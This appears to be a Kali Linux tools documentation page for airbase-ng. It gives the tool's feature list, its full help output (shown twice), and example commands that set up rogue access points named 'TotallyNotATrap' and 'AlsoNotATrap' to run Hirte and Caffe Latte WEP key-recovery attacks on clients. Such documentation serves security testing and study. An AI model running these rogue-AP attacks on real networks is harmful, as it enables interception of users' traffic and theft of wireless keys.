Airbase-ng Description
Airbase-ng is included in the aircrack-ng package. It is a multi-purpose tool aimed at attacking clients as opposed to the Access Point itself. Some of its many features are:
- Implements the Caffe Latte WEP client attack
- Implements the Hirte WEP client attack
- Ability to cause the WPA/WPA2 handshake to be captured
- Ability to act as an ad-hoc Access Point
- Ability to act as a full Access Point
- Ability to filter by SSID or client MAC addresses
- Ability to manipulate and resend packets
- Ability to encrypt sent packets and decrypt received packets
Source: Airbase-ng Wiki
Airbase-ng Homepage | Kali aircrack-ng Repo
- Author: Thomas d’Otreppe, Original work: Christophe Devine
- License: GPLv2
airbase-ng – multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself
root@kali:~# airbase-ng --help
Airbase-ng 1.2 rc4 - (C) 2008-2015 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
-n hex : User specified ANonce when doing the 4-way handshake
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
Airbase-ng 1.2 rc4 - (C) 2008-2015 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
-n hex : User specified ANonce when doing the 4-way handshake
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
airbase-ng Usage Examples
Hirte Attack – Access Point Mode
The Hirte attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e TotallyNotATrap) and uses the cfrag WEP attack (-N), setting the WEP flag in the beacons (-W 1).
root@kali:~# root@kali:~# airbase-ng -c 6 -e TotallyNotATrap -N -W 1 wlan0mon
15:51:11 Created tap interface at0
15:51:11 Trying to set MTU on at0 to 1500
15:51:11 Trying to set MTU on wlan0mon to 1800
15:51:11 Access Point with BSSID 3C:46:D8:4E:EF:AA started.
15:51:11 Created tap interface at0
15:51:11 Trying to set MTU on at0 to 1500
15:51:11 Trying to set MTU on wlan0mon to 1800
15:51:11 Access Point with BSSID 3C:46:D8:4E:EF:AA started.
Caffe Latte Attack – Access Point Mode
As with the Hirte attack, the Caffe Latte Attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e AlsoNotATrap) and uses the Caffe Latte WEP attack (-L), setting the WEP flag in the beacons (-W 1).
root@kali:~# airbase-ng -c 6 -e AlsoNotATrap -L -W 1 wlan0mon
15:56:05 Created tap interface at0
15:56:05 Trying to set MTU on at0 to 1500
15:56:05 Access Point with BSSID 3C:46:D8:4E:EF:AA started.
15:56:05 Created tap interface at0
15:56:05 Trying to set MTU on at0 to 1500
15:56:05 Access Point with BSSID 3C:46:D8:4E:EF:AA started.